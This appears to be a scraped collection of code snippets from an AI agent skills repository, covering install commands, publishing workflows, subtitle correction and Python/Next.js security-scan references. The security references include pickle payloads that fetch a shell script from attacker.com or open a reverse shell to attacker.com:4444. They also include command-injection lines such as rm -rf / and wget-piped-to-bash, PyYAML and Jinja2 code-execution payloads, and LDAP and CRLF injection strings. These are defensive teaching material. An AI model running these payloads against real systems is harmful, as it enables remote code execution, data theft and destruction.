### Install and Verify akshare Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt Installs the akshare library and pandas/numpy, then verifies the akshare installation by printing its version. ```bash pip install akshare pandas numpy python -c "import akshare; print(akshare.__version__)" ``` -------------------------------- ### Install Dependencies Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/china-stock-analysis/SKILL.md Install the necessary Python libraries for the stock analysis skill. Ensure you have Python and pip installed. ```bash pip install akshare pandas numpy ``` -------------------------------- ### Example Video Directory Creation Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/video-script/SKILL.md An example of how a date-based directory for a video on 'React Server Components' might look. ```bash ./videos/2026-03-07-react-server-components/ ``` -------------------------------- ### Check akshare Installation Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/china-stock-analysis/SKILL.md Verify if the akshare library is installed and check its version. If not installed, this command will fail, prompting you to install it. ```bash python -c "import akshare; print(akshare.__version__)" ``` -------------------------------- ### Install akshare if Missing Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/china-stock-analysis/SKILL.md Command to install the akshare library if it's not found on your system. This is a prerequisite for using the stock analysis tools. ```bash pip install akshare ``` -------------------------------- ### Install Agent Skills Collection Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt Commands to add the Agent Skills marketplace source and install the '01coder-skills' plugin bundle. ```bash # Step 1 – add the marketplace source /plugin marketplace add sugarforever/01coder-agent-skills # Step 2 – install the plugin bundle /plugin install 01coder-skills@01coder-agent-skills ``` -------------------------------- ### Install Mermaid CLI for Diagram to Image and Publish X Article Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md Installs the mermaid-cli globally using npm. This is required for the Diagram to Image and Publish X Article skills. ```bash npm install -g @mermaid-js/mermaid-cli ``` -------------------------------- ### Install Python Dependencies for Diagram to Image Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md Installs the Pillow library for image manipulation, required by the Diagram to Image skill. ```bash pip install pillow ``` -------------------------------- ### Install and Add Marketplace Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/CLAUDE.md Commands to add the marketplace to Claude Code and then install a specific plugin from that marketplace. New skills are automatically detected on marketplace updates. ```bash /plugin marketplace add sugarforever/01coder-agent-skills /plugin install 01coder-skills@01coder-agent-skills ``` -------------------------------- ### Install Python Dependencies for Publish X Article (Windows) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md Installs Python dependencies for the Publish X Article skill on Windows. Requires Python 3.9+. ```bash pip install Pillow pywin32 clip-util markdown ``` -------------------------------- ### Usage Examples for China Stock Analysis Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md These are example commands for interacting with the China Stock Analysis skill. They demonstrate how to perform stock screening, analysis, industry comparison, and valuation calculations. ```bash 分析贵州茅台 ``` ```bash 筛选PE小于15、ROE大于15%的沪深300股票 ``` ```bash 对比白酒行业前10名 ``` ```bash 计算600519的内在价值 ``` -------------------------------- ### Install Python Dependencies for Publish X Article (macOS) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md Installs Python dependencies for the Publish X Article skill on macOS. Requires Python 3.9+. ```bash pip install Pillow pyobjc-framework-Cocoa markdown ``` -------------------------------- ### Pickle exploit example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md This example demonstrates how to create a malicious pickle payload that executes arbitrary code on the server when deserialized. The `__reduce__` method is leveraged to call `os.system`. ```python import pickle import os class Exploit: def __reduce__(self): return (os.system, ('curl http://attacker.com/shell.sh | bash',)) # Generate malicious payload payload = pickle.dumps(Exploit()) # Send payload to vulnerable endpoint ``` -------------------------------- ### SRT File Structure Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/references/srt-format.md Illustrates the basic structure of an SRT file, showing sequential entries with timestamps and text content. Each entry is separated by an empty line. ```srt 1 00:00:01,500 --> 00:00:04,500 First line of subtitle text Optional second line 2 00:00:04,700 --> 00:00:07,666 Next subtitle text ``` -------------------------------- ### Example Candidate Post 1: Summary Recommendation (Chinese) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/share-reading/SKILL.md A candidate social media post in Chinese, summarizing the article and offering a recommendation. Includes the source link. ```chinese Rust 正式进入 Linux 6.12 内核的网络子系统。这意味着内核中最关键、也最容易出内存安全问题的模块,开始用 Rust 重写了。 文章详细讲了迁移策略:不是一刀切,而是新模块用 Rust 写,老代码逐步替换。最实际的一点 - 已经在生产环境跑了 3 个月,零内存安全 bug。 https://example.com/article-about-rust-in-linux ``` -------------------------------- ### Example Image Upload Workflow (Markdown Mode) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md Steps to upload an image in Markdown mode, including taking a verbose snapshot, identifying the 'Add image' button, uploading the file, and verifying with a screenshot. ```python # 1. Take verbose snapshot to find image button take_snapshot(verbose=true) # 2. Find "Add image" button (e.g., uid=26_59) # Look for: generic description="Add image" # 3. Upload image directly to the button upload_file: uid: 26_59 # (example uid for "Add image" button) filePath: /Users/user/Downloads/image.png # 4. Verify with screenshot take_screenshot ``` -------------------------------- ### User Interaction Example 1: Upload without terms Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/SKILL.md Demonstrates a user uploading a subtitle file without providing initial terms, prompting Claude to request them. ```text User: 帮我修正这个字幕文件 Claude: 在开始修正之前,请提供一些关键术语,帮助我更准确地识别语音识别错误: 1. **专有名词**:人名、品牌名、产品名 2. **技术术语**:框架、库、工具名称 3. **领域词汇**:行业特定词汇 4. **其他关键词**:视频中频繁出现的重要词汇 请用逗号分隔,例如:`LangChain, Agent, OpenAI` User: LangChain, Agent, OpenAI, LangGraph, checkpointer Claude: 收到以下术语: - 技术框架:LangChain, LangGraph, OpenAI - 技术概念:Agent, checkpointer 这是一个 LangChain 相关的技术教程。还有补充吗? User: 没有了,开始吧 Claude: [Proceeds with correction workflow] ``` -------------------------------- ### Apply Feishu Skill Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md Applies the Feishu skill package to deterministically modify project files, install dependencies, and update configuration. ```bash npx tsx scripts/apply-skill.ts .claude/skills/add-feishu ``` -------------------------------- ### Markdown Image Reference Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md Example of how to reference a generated image within a markdown document. This replaces a diagram or table that cannot be directly rendered. ```markdown ![Diagram description](/tmp/diagram-001.png) ``` -------------------------------- ### User Interaction Example 2: Provide terms upfront Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/SKILL.md Illustrates a user providing key terms upfront when requesting subtitle correction, allowing Claude to proceed directly. ```text User: 帮我修正字幕,术语:LangChain, OpenAI, Agent Claude: [Confirms terms, then proceeds directly] ``` -------------------------------- ### Example Image Upload Workflow (Rich Text Mode) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md Steps to upload an image in Rich Text mode, including taking a snapshot, identifying the 'image' button, uploading the file, and verifying with a screenshot. ```python # 1. Take snapshot to find image button take_snapshot # 2. Find image button (e.g., uid=12_7) # Look for: button "image" # 3. Upload image to the button upload_file: uid: 12_7 # (example uid for image button) filePath: /Users/user/Downloads/image.png # 4. Verify with screenshot take_screenshot ``` -------------------------------- ### Example Candidate Post 3: Discussion Starter (Chinese) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/share-reading/SKILL.md A candidate social media post in Chinese, framing a question around the content to spark engagement. Includes the source link. ```chinese Linux 内核的网络子系统开始用 Rust 了。跑了 3 个月,零内存安全 bug。 但评论区有个好问题:Rust 的编译时间和学习曲线,对内核贡献者社区的影响会有多大?快速迭代和安全保障之间,怎么平衡? https://example.com/article-about-rust-in-linux ``` -------------------------------- ### Basic FastAPI Input Validation Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/fastapi-security.md Illustrates a basic FastAPI endpoint for retrieving user data, highlighting a potential vulnerability if the user_id is not properly validated as an integer. ```python from fastapi import FastAPI, Query # No input validation @app.get("/users/{user_id}") async def get_user(user_id: str): # Should be int return db.query(f"SELECT * FROM users WHERE id = {user_id}") ``` -------------------------------- ### Clone Agent Skills Repository Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md This command clones the agent-skills repository from GitHub. Ensure you have Git installed and configured. ```bash git clone https://github.com/sugarforever/agent-skills.git ``` -------------------------------- ### Server Components Data Exposure (Safe Alternative) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/nextjs-specific.md This example demonstrates a safe alternative for Server Components by selecting only necessary, non-sensitive data before passing it to Client Components. ```typescript // ✅ SAFE - Only pass necessary data async function UserProfile() { const user = await db.user.findUnique({ select: { id: true, name: true, email: true // No sensitive fields } }); return ; } ``` -------------------------------- ### Command Injection: Attack Payloads Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md Provides examples of common attack payloads for command injection, including command chaining with `;`, `&&`, `||`, subshell execution using `$(...)` or `` `...` ``, and input/output redirection. ```bash # Command chaining ; rm -rf / && cat /etc/passwd || wget http://evil.com/shell.sh | bash # Subshell execution $(cat /etc/passwd) `cat /etc/passwd` # Input redirection < /etc/passwd > /tmp/pwned ``` -------------------------------- ### Example Candidate Post 2: Key Highlight (Chinese) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/share-reading/SKILL.md A candidate social media post in Chinese, highlighting a key quote or point from the article and adding brief context. Includes the source link. ```chinese "我们不是要用 Rust 重写 Linux,而是让新代码不再产生旧问题。" Linux 网络子系统开始引入 Rust,最值得关注的不是语言之争,而是他们的渐进式迁移策略 - 这对所有大型 C 项目都有参考价值。 https://example.com/article-about-rust-in-linux ``` -------------------------------- ### PyYAML exploit examples Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md Demonstrates various PyYAML exploit payloads, including executing system commands, reading files, and arbitrary code execution using `!!python/object/apply` and `!!python/object/new` tags. ```yaml # Execute system command !!python/object/apply:os.system ['id'] # Execute with subprocess !!python/object/apply:subprocess.check_output [['cat', '/etc/passwd']] # Arbitrary code execution !!python/object/apply:builtins.eval ['__import__("os").system("id")'] # Read files !!python/object/apply:builtins.open ['etc/passwd'] # Complex payload !!python/object/new:type args: ['exploit', !!python/tuple [], {'__reduce__': !!python/object/apply:builtins.eval ['lambda: __import__("os").system("id")']}] ``` -------------------------------- ### LDAP Injection: Attack Payloads Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md Provides examples of attack payloads for LDAP injection, demonstrating how to bypass authentication or manipulate search filters using special characters and logical operators. ```text # Bypass authentication *)(uid=*))(|(uid=* admin)(|(password=* *))%00 ``` -------------------------------- ### Implement Rate Limiting with Flask-Limiter Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Apply rate limiting to Flask routes using Flask-Limiter to prevent abuse. This example demonstrates setting default limits and specific limits for login and API endpoints. ```python from flask_limiter import Limiter from flask_limiter.util import get_remote_address limiter = Limiter( app, key_func=get_remote_address, default_limits=["200 per day", "50 per hour"] ) @app.route('/login', methods=['POST']) @limiter.limit("5 per minute") def login(): # Login logic pass @app.route('/api/data') @limiter.limit("100 per minute") def api_data(): pass ``` -------------------------------- ### Initialize Skills System Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md Run this command if the .nanoclaw/ directory does not exist to initialize the skills system. ```bash npx tsx scripts/apply-skill.ts --init ``` -------------------------------- ### SRT Subtitle Correction Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/references/srt-format.md Demonstrates a before-and-after comparison of subtitle text correction in an SRT file. The 'Before' example shows errors, while the 'After' example presents the corrected version. ```srt 53 00:02:23,433 --> 00:02:25,833 定义了一款工具summers conversation 54 00:02:26,133 --> 00:02:28,166 这款工具除了用了Lantern ``` ```srt 53 00:02:23,433 --> 00:02:25,833 定义了一款工具summarize_conversation 54 00:02:26,133 --> 00:02:28,166 这款工具除了用了LangChain ``` -------------------------------- ### FastAPI Framework Detection Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/fastapi-security.md Python code demonstrating how to import FastAPI and initialize an application instance. ```python from fastapi import FastAPI from fastapi import * app = FastAPI() ``` -------------------------------- ### Install Pip-Audit for Python Security Scan Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md Installs pip-audit, a tool for auditing Python package vulnerabilities, required for the Python Security Scan skill. ```bash pip install pip-audit ``` -------------------------------- ### Multiple Choice Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/interactive-input/references/schema.md An example of an interactive card for a multiple-choice question, allowing users to select multiple options. The 'isMultiSelect' property is set to true. ```interactive { "id": "even-numbers", "card": { "body": [ { "type": "TextBlock", "text": "Select all even numbers:", "weight": "bold" }, { "type": "Input.ChoiceSet", "id": "answer", "style": "expanded", "isMultiSelect": true, "choices": [ { "title": "12", "value": "12" }, { "title": "15", "value": "15" }, { "title": "28", "value": "28" }, { "title": "33", "value": "33" } ] } ], "actions": [{ "type": "Action.Submit", "title": "Submit" }] } } ``` -------------------------------- ### Rebuild and Restart Application (Linux) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md Rebuild the application and restart the Nanoclaw service on Linux. ```bash npm run build && systemctl --user restart nanoclaw ``` -------------------------------- ### Single Choice Quiz Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/interactive-input/references/schema.md An example of a complete interactive card for a single-choice quiz question. It includes a text block for the question and a choice set for the answers. ```interactive { "id": "math-q1", "card": { "body": [ { "type": "TextBlock", "text": "What is 2 + 3 × 4?", "weight": "bold" }, { "type": "Input.ChoiceSet", "id": "answer", "style": "expanded", "choices": [ { "title": "A. 20", "value": "20" }, { "title": "B. 14", "value": "14" }, { "title": "C. 24", "value": "24" }, { "title": "D. 11", "value": "11" } ] } ], "actions": [{ "type": "Action.Submit", "title": "Submit" }] } } ``` -------------------------------- ### Vulnerable Flask SSTI Examples Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Examples demonstrating Server-Side Template Injection (SSTI) in Flask by rendering user-controlled input directly within templates. This can lead to arbitrary code execution. ```python from flask import render_template_string # Direct user input in template @app.route('/hello') def hello(): name = request.args.get('name') return render_template_string(f'Hello {name}!') # Template from user input @app.route('/template') def custom_template(): template = request.form.get('template') return render_template_string(template) ``` -------------------------------- ### Vulnerable Flask Secret Key Examples Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Examples of insecure Flask secret key configurations. Using default or easily guessable keys can lead to session cookie forgery and other attacks. ```python app.secret_key = 'development' app.config['SECRET_KEY'] = 'super-secret-key' SECRET_KEY = 'change-me' ``` -------------------------------- ### Create Date-Based Video Directory Structure Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/video-script/SKILL.md This is the standard directory structure for organizing video content. It includes a date-based folder with a short slug, containing script, blog, and platform-specific publishing files. ```bash ./videos/{YYYY-MM-DD}-{short-slug}/ ├── script.md # 视频口播稿 ├── blog.md # 博客文章 ├── youtube.md # YouTube 发布素材 └── bilibili.md # Bilibili 发布素材 ``` -------------------------------- ### Navigate to X Articles Editor Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md Opens the X articles composition page in the browser. Note that after loading, a draft list appears; you must click 'create' to open the editor. ```shell browser_navigate: https://x.com/compose/articles ``` -------------------------------- ### Configure Environment Variables Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md Adds Feishu App ID and App Secret to the .env file for authentication. ```bash FEISHU_APP_ID= FEISHU_APP_SECRET= ``` -------------------------------- ### XML Deserialization Exploit Examples Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md Provides examples of XML payloads designed to exploit XXE vulnerabilities for reading local files or performing Server-Side Request Forgery (SSRF), and a Billion Laughs attack for Denial-of-Service. ```xml ]> &xxe; ]> &xxe; ]> &lol9; ``` -------------------------------- ### Validate Code Changes Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md Builds the project to ensure code changes are clean and valid before proceeding with setup. ```bash npm run build ``` -------------------------------- ### Diagram Conversion with Options Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Converts a diagram to an image, allowing customization of theme, type, scale, background color, and server URL. Use this to tailor the output image appearance and behavior. ```bash node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/table.md -o .png --type table --theme dark --scale 3 --bg "transparent" --server https://diagramless.xyz ``` -------------------------------- ### macOS Pyperclip Dependency Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-substack-article/SKILL.md If the `copy_to_clipboard.py` script fails on macOS, ensure the `pyobjc-framework-Cocoa` dependency is installed. This is required for clipboard access on macOS. ```bash pip install pyobjc-framework-Cocoa ``` -------------------------------- ### Header Injection Attack Payloads Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md Examples of payloads for CRLF injection in headers, allowing the injection of new lines and potentially malicious content. ```regex # CRLF injection value\r\nX-Injected: malicious value\r\n\r\n ``` -------------------------------- ### Detect Weak Password Validation (TypeScript) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/owasp-top-10.md Example of insufficient password length validation. Implement strong password policies and complexity requirements. ```typescript if (password.length >= 4) { ... } ``` -------------------------------- ### Check Next.js Version and Vulnerabilities Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/nextjs-specific.md Use npm commands to check your Next.js version, identify outdated packages, and audit for known vulnerabilities. Keeping your dependencies up-to-date is crucial for security. ```bash # Check Next.js version npm list next # Check for outdated packages npm outdated # Check for known vulnerabilities npm audit ``` -------------------------------- ### Implement Rate Limiting with SlowAPI Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/fastapi-security.md Apply rate limiting to specific API endpoints to prevent abuse. Ensure SlowAPI is installed and configured with the application. ```python from slowapi import Limiter, _rate_limit_exceeded_handler from slowapi.util import get_remote_address from slowapi.errors import RateLimitExceeded limiter = Limiter(key_func=get_remote_address) app.state.limiter = limiter app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler) @app.post("/login") @limiter.limit("5/minute") async def login(request: Request, credentials: Credentials): pass @app.post("/password-reset") @limiter.limit("3/hour") async def reset_password(request: Request, email: str): pass ``` -------------------------------- ### Initial Promotion Information Request Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/video-script/SKILL.md On the first use, this prompt asks the user for their personal promotion details to be saved for future use. This includes social media links, community links, contact information, and other fixed promotional content. ```text 我注意到这是你第一次使用视频脚本 skill。请提供你的个人推广信息,我会记住以便后续使用: - 社交媒体链接(Twitter、Bilibili、YouTube 等) - 知识星球/社群链接 - 联系方式 - 其他固定推广信息(如课程链接、赞助信息等) ``` -------------------------------- ### LDAP Injection Vulnerable Patterns Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/injection-patterns.md Vulnerable code examples demonstrating LDAP injection using string concatenation and template literals with user input. ```typescript // ❌ VULNERABLE const filter = `(uid=${username})`; const filter = '(cn=' + searchTerm + ')'; ``` -------------------------------- ### Template Injection (SSTI) Attack Payloads Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md Examples of payloads used to exploit SSTI vulnerabilities, including accessing configuration, and achieving Remote Code Execution (RCE). ```python # Read config {{ config }} {{ config.items() }} # RCE via Jinja2 {{ ''.__class__.__mro__[2].__subclasses__() }} {{ ''.__class__.__base__.__subclasses__()[X].__init__.__globals__['os'].popen('id').read() }} # Flask specific {{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }} ``` -------------------------------- ### Navigate to Zsxq Article Editor Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md Navigates to the Zsxq article editor page. If not logged in, the user will be prompted to log in manually. ```bash # Navigate to the article editor with group ID navigate_page: https://wx.zsxq.com/article?groupId=51111858848454 ``` -------------------------------- ### Check for existing image directories Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Find the most appropriate directory for saving generated images based on common project conventions. ```bash # Check for existing image directories (in order of preference) ls -d ./images ./assets ./img ./static ./public/images ./assets/images 2>/dev/null | head -1 ``` -------------------------------- ### Generate Video Script and Assets Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt Generates a full content package for a video, including spoken script, blog article, and platform-specific publishing materials. Requires user input on topic, platform, duration, and key points. ```bash # Trigger phrases 写视频脚本 / 视频口播稿 / video script / prepare video / 视频发布素材 # Output directory structure ./videos/2026-03-07-react-server-components/ ├── script.md # 口播稿 – conversational spoken script ├── blog.md # standalone blog article (not a transcript) ├── youtube.md # title, description, tags, chapter timestamps └── bilibili.md # same content, Bilibili-adapted promo placement # Trigger conversation 请提供以下信息: 1. 视频主题(必填) 2. 目标平台:YouTube / Bilibili / 两者 3. 目标时长(默认 10 分钟) 4. 目标观众(如:开发者、AI 爱好者) 5. 关键要点或大纲 6. 参考资料 URL(可选) ``` -------------------------------- ### Create New X Article Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md After navigating to the articles page, this command clicks the 'create' button to open the article editor. It relies on a browser snapshot to identify the button. ```shell # 1. 导航到页面 browser_navigate: https://x.com/compose/articles # 2. 获取页面快照,找到 create 按钮 browser_snapshot # 3. 点击 create 按钮(通常 ref 类似 "create" 或带有 create 标签) browser_click: element="create button", ref= # 4. 现在编辑器应该打开了,可以继续上传封面图等操作 ``` -------------------------------- ### Determine output path logic Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Illustrates the decision-making process for selecting an output path for the generated image, prioritizing user specification and project context. ```bash # Example logic (implement mentally, not as literal script) if user_specified_path: output_path = user_specified_path elif exists("./images"): output_path = "./images/{generated_name}.png" elif exists("./assets"): output_path = "./assets/{generated_name}.png" elif exists("./public/images"): output_path = "./public/images/{generated_name}.png" else: output_path = "./{generated_name}.png" ``` -------------------------------- ### Convert diagram to PNG with custom theme Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Convert a diagram to a PNG image using the bundled script and apply a custom theme. ```bash # With custom theme node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/diagram.mmd -o .png --theme ocean ``` -------------------------------- ### Server Actions With Input Validation (Safe) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/nextjs-specific.md This example shows a safe Server Action that incorporates input validation using Zod to ensure data integrity and security. ```typescript // ✅ SAFE - With validation 'use server' import { z } from 'zod'; const postSchema = z.object({ title: z.string().min(1).max(200), content: z.string().min(1).max(10000) }); export async function createPost(formData: FormData) { const result = postSchema.safeParse({ title: formData.get('title'), content: formData.get('content') }); if (!result.success) { return { error: result.error.flatten() }; } await db.post.create({ data: result.data }); } ``` -------------------------------- ### Rebuild and Restart Application (macOS) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md Rebuild the application and restart the Nanoclaw service on macOS. ```bash npm run build && launchctl kickstart -k gui/$(id -u)/com.nanoclaw ``` -------------------------------- ### Convert Markdown to HTML with Python Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt Converts a Markdown file to HTML, stripping YAML frontmatter and handling tables and fenced code blocks. Ensure the 'markdown' library is installed. ```python import markdown, re with open('/path/to/article.md') as f: content = f.read() # Strip YAML frontmatter content = re.sub(r'^---\n.*?\n---\n', '', content, flags=re.DOTALL) # Convert — do NOT use nl2br extension (causes double line breaks) html = markdown.markdown(content, extensions=['tables', 'fenced_code']) with open('/tmp/substack_article.html', 'w') as f: f.write(html) ``` -------------------------------- ### Complete Article Publishing Flow Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md A step-by-step outline for publishing an article to Zsxq, from reading the file to reporting success. ```text 1. Read /path/to/my-article.md - Extract title from H1 or first line - Get full content 2. Navigate to https://wx.zsxq.com/article?groupId=51111858848454 3. Check if logged in - If not, prompt user to login 4. Switch to Markdown mode if needed - Click "切换到 Markdown 模式 (内测)" - Confirm dialog 5. Fill title - Click title input - Use `fill` tool to set title text 6. Insert content via paste event - Use `evaluate_script` to simulate paste event - This triggers Milkdown to parse and render Markdown 7. Save as draft - Click "保存" 8. Report success - "草稿已保存,请手动预览并发布" ``` -------------------------------- ### Flask SSTI Exploit Examples Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Illustrative exploit payloads for Server-Side Template Injection (SSTI) in Flask, showing how to access configuration and execute arbitrary operating system commands. ```jinja # Access config {{ config }} {{ config.SECRET_KEY }} # RCE {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }} ``` -------------------------------- ### Check bundled script location Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Verify the location of the bundled diagram-to-image rendering script. ```bash # The render script is bundled with this skill: SKILL_DIR=~/.claude/skills/diagram-to-image/scripts ls $SKILL_DIR/diagram-to-image.mjs ``` -------------------------------- ### Enable Flask Debug Mode Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Vulnerable code examples that enable Flask's debug mode, exposing the Werkzeug debugger with code execution capabilities. This should not be used in production. ```python # Exposes Werkzeug debugger with code execution app.run(debug=True) app.config['DEBUG'] = True if __name__ == '__main__': app.run(debug=True, host='0.0.0.0') # Exposed to network! ``` -------------------------------- ### More sophisticated pickle exploits Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md These examples showcase advanced pickle exploitation techniques using `subprocess`, `eval`, and chained exploitation to achieve code execution or establish reverse shells. ```python # Using subprocess for more control class Exploit: def __reduce__(self): import subprocess return (subprocess.check_output, (['cat', '/etc/passwd'],)) # Using eval class Exploit: def __reduce__(self): return (eval, ("__import__('os').system('id')",)) # Chained exploitation class Exploit: def __reduce__(self): return ( exec, ("import socket,subprocess,os;s=socket.socket();s.connect(('attacker.com',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])",) ) ``` -------------------------------- ### Create temporary input file for Mermaid diagrams Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Temporarily store Mermaid diagram content in a file for processing. ```bash # For Mermaid diagrams cat > /tmp/diagram.mmd << 'DIAGRAM_EOF' DIAGRAM_EOF ``` -------------------------------- ### Terminal Diff Output Example Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/SKILL.md The default terminal output for the diff command shows word-level changes with color coding. Deleted text is in red and added text is in green. ```text [1] 00:00:01,500 --> 00:00:04,500 今天我们来学习[-Luncheon-]{+LangChain+}框架 [3] 00:00:08,000 --> 00:00:12,500 我们可以用它来创建[-绘画-]{+会话+}应用程序 ``` -------------------------------- ### Secure Temporary File and Directory Creation in Python Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/python-vulnerabilities.md Utilize the `tempfile` module to securely create temporary files and directories, mitigating race conditions and symlink attacks. ```python import tempfile # Secure temporary file with tempfile.NamedTemporaryFile(delete=False) as f: f.write(data) temp_path = f.name # Secure temporary directory with tempfile.TemporaryDirectory() as tmpdir: filepath = os.path.join(tmpdir, 'file.txt') ``` -------------------------------- ### Check and Compress Image Size (Bash) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md Use bash commands to check an image's file size and compress it using sips on macOS if it exceeds recommended limits. ```bash # Check size ls -la /path/to/image.png ``` ```bash # Compress if needed (macOS) sips -s format jpeg -s formatOptions 80 /path/to/image.png --out /path/to/image_compressed.jpg ``` -------------------------------- ### Personal Writing Style Guide Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt Provides a quick reference for punctuation, article structure, and YAML frontmatter conventions for Chinese content. Ensures consistent formatting and prose style. ```markdown | Element | Use | Avoid | |----------------|--------------|--------------| | Dash | ` - ` (space-hyphen-space) | `——` | | Ellipsis | `......` | `……` | | Quotes (body) | `""` curved | `""` straight| - No numbered scaffolding or explicit "总结" sections - Paragraphs flow as natural prose; transitions bridge topics - Technical names and code use ASCII; body text uses Chinese punctuation --- title: "My Article" --- ``` -------------------------------- ### Command Injection: Safe Alternatives Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md Demonstrates secure practices to prevent command injection in Python, such as using list arguments with `subprocess` functions (avoiding `shell=True`), quoting arguments with `shlex.quote` when `shell=True` is unavoidable, and validating input against an allowlist using regular expressions. ```python import subprocess import shlex # Use list arguments (no shell) subprocess.run(['ping', '-c', '1', host]) subprocess.run(['grep', pattern, filename]) # If shell is required, use shlex.quote subprocess.run(f"ping -c 1 {shlex.quote(host)}", shell=True) # Validate against allowlist import re HOSTNAME_REGEX = re.compile(r'^[a-zA-Z0-9][a-zA-Z0-9.-]*$') if not HOSTNAME_REGEX.match(host): raise ValueError("Invalid hostname") subprocess.run(['ping', '-c', '1', host]) ``` -------------------------------- ### Insecure Flask Session Configuration Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Examples of vulnerable Flask session 